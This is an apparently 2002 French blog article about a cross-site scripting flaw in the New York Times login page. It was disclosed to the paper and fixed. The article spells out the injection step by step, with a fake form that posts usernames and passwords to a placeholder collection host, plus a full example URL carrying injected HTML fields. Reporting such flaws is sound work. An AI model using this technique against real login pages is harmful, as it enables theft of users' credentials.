Comment nous avons perdu 230 euros chez CJ Affiliate (Conversant)

[accueil]  [menu]  [marions-nous !]  [chercher]


2002-08-23 02:05

Failles de CSS sur le site du New York Times


Un de nos lecteurs, Valdeux (encore lui !), a découvert une faille de Cross Site Scripting sur le site du New York Times (www.Nytimes.com). Cette vulnérabilité, importante, permet de récupérer en toute discrétion les comptes des abonnés en ligne. Techniquement, elle concerne une variable dénommée « URI » présente à la page http://www.nytimes.com/auth/login?URI=http:// . Elle se situe dans la case du tableau où sont saisis identifiant et mot de passe des lecteurs du journal, grâce à une balise Input. Invisible (hidden), celle-ci a une valeur entre guillemets. Si on lui assigne ' , le guillemet et la balise sont fermés. Si l'on spécifie plutôt ' [!-- , tout le reste du code HTML de la case est en outre considéré comme du commentaire, et n'est donc plus affiché ! Entre cette fermeture de la balise et l'ouverture du commentaire, on peut aisément exploiter la brèche. Il suffit, à partir dans l'URL du site, d'injecter un formulaire piége imitant à la perfection l'original : http://www.nytimes.com/auth/login?URI=' code_du_formulaire_piège[!-- . A cette fin, on y fermera la balise input (' ) puis la balise form ([/form ) et on placera une commande de type [form action='http://adressederécupération.com/enregistre.php'. Cette dernière récupérera les login et password de l'utilisateur dans la page enregistre.php hébergée sur le site adressederécupération.com. Pour plus de réalisme, la personne malintentionnée peut achever ce vol de données en redirigeant l'utilisateur vers le site du New York Times. Nous avons alerté le journal lequel nous a remercié et a corrigé la brèche quelques heures plus tard. Il n'a pas perdu de... temps !

Un exemple inoffensif : http://www.nytimes.com/auth/login?URI=' [b [h4 CSS%20hole%20on%20NYTimes%20website.%20Unexploitable%20example%20:[/h4 [br [br Here %20a%20hacker%20could%20ask%20for%20your%20ID[br [input%20name='hum'%2 0value='victim%20ID' [br and%20your%20password%20:[br [input%20type='p assword'%20name='hmm' [br [br And%20then%20get%20them%20if%20victim%20 clicks%20on%20a%20[input%20type='button'%20name='hem'%20value='Submit% 20button' [!- .
Le résultat en image : http://www.acbm.com/inedits/images/nyt.jpg



Vous aimez cette page ? Partagez-en le lien !

Facebook
Twitter
Google+
LinkedIn
Reddit

Vous pouvez recopier librement le contenu de cette page ailleurs (en indiquant le lien de cette page), mais sans le modifier ni en faire un usage commercial. Ce contenu est sous licence Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License.
Creative Commons License

[homepage] [RSS] [archives] [legal & cookies] [since 1997]